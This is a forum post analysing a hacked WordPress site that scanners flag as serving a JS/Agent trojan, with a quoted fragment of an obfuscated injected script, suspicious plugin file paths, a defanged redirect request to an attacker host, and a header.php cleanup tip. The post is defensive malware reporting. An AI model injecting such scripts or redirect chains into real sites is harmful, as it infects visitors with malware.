Blocked is JS:Agent-ZZ[Trj] | {gzip} here ->: http://urlquery.net/report.php?id=7524212
See all the IDS alerts on the urlquery dot net scan.
Other scans like Sucuri’s trigger enough of the malcode, malware variant of JS/Agent.NCA trojan, to be also immediately blocked.
Blacklisted by Google Safebrowsing.
Suspicious Text before HTML
Suspicious java script Suspicious d>document.write(unescape('%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%6
WordPress injected script security hole for decoding see this link (credits go to Jonathan Wold) http://stackoverflow.com/questions/3391623/decode-some-injected-java script
Suspect Included Scripts to be checked: Suspect - please check list for unknown includes
htxp://gastronerds.com/wp-content/plugins/multi-level-navigation-plugin/scripts/hoverintent.js.php?ver=r5
Not found see: http://jsunpack.jeek.org/?report=0cd7ab4d2440f4ab7e433036ab16b865dbf73d1f
htxp://gastronerds.com/wp-content/plugins/multi-level-navigation-plugin/scripts/superfish_settings.js.php?ver=1.0
Trojan object htxp://gastronerds.com/?cat=101
CMS: wordpress 2.7.1 vulnerable to PHP Script Injection Exploit via plug-ins folder.
This Request GET /tds/in dot cgi?2&seoref=undefined¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=htxp%3A%2F%2Fgastronerds.com%2F&default_keyword=notdefine HTTP/1.1
Host: itsallbreaksoft dot net is the used site hack, described here:
-
To perform an immediate fix, simply remove the code from your header.php file, and then make sure that your header.php file isn’t writable by anyone other than you.
Link and quote info credits go to see: http://www.theinternetpatrol.com/authors/
Good feeling. We are being protected by avast!
polonus